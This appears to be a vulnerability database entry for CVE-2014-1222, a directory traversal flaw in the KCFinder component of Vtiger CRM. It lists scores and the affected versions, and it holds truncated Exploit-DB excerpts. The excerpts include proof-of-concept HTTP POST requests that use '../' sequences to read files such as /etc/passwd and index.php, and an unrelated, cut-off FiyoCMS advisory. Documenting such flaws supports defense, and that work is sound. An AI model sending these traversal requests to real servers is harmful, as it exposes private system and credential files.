CVE-2014-1222
Published: 2014-08-12
Priority: P4 | 31 | medium | 4 | CVSS 2.0
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:P/I:N/A:N
Tags: EXPLOIT
EPSS: 8.79% (94.5th percentile)
Directory traversal vulnerability in kcfinder/browse.php in Vtiger CRM before 6.0.0 Security patch 1 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter in a download action. NOTE: it is likely that this issue is actually in the KCFinder third-party component, and it affects additional products besides Vtiger CRM.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vtiger | vtiger_crm | <= 6.0.0 | — |
No detection rules found.
Exploit-DB: Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
exploitdb · 2015-03-31 · CVSS 7.5 · CVE-2014-9148 [HIGH]
---
# Exploit Title: FiyoCMS Multiple Vulnerabilities
# Date: 29 March 2015
# Exploit Author: Mahendra
# Vendor Homepage: www.fiyo.org
# Software Link: http://sourceforge.net/projects/fiyo-cms/
# Version: 2.0.1.8; other versions might be vulnerable.
# Tested: Kali Linux 1.0.9a-amd64
# CVE(s): CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148
*Advisory Timeline*
30-11-2014: Vendor notified and responded back
01-12-2014: Vulnerabilities provided to vendor
03-14-2015: Vendor released newer version claimed to fix the vulnerabilities
29-03-2015: Advisory released
FiyoCMS 2.0.1.8 SQL injection, XSS, Direct URL bypass
*Advisory details*
Several security issues have been identified on the latest FiyoCMS platform.
*Proof of Concept (PoC)*
Mu
Exploit-DB: vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion
exploitdb · 2014-03-12 · CVSS 4.0 · CVE-2014-1222 [MEDIUM]
---
CVE: CVE-2014-1222
Vendor: Vtiger
Product: CRM
Affected version: Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version: Vtiger 6.0.0 Security patch 1
Reported by: Jerzy Kramarz
Details:
A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose the contents of arbitrary files.
The following request is a Proof-of-Concept for retrieving the /etc/passwd file from a remote system.
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,applicatio
Exploit-DB: KCFinder 2.51 - Local File Disclosure
exploitdb · 2013-08-15 · CVE-2014-1222
---
# Exploit Title: KCFinder Local File Disclosure
# Author: DaOne
# Vendor Homepage: http://kcfinder.sunhater.com/
# Category: webapps/php
# Version: 2.51 and older versions
# Google dork: inurl:kcfinder/browse.php
[#] Tested on their own demo...
-PoC-
POST http://server/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
Host: server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
dir=images/Photos+from+Bulgaria&file=../../../index.php
No writeups or analysis indexed.
References:
http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%206.0.0/Add-ons/vtigercrm-600-security-patch1.zip/download
http://www.securityfocus.com/archive/1/531423/100/0/threaded
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1222/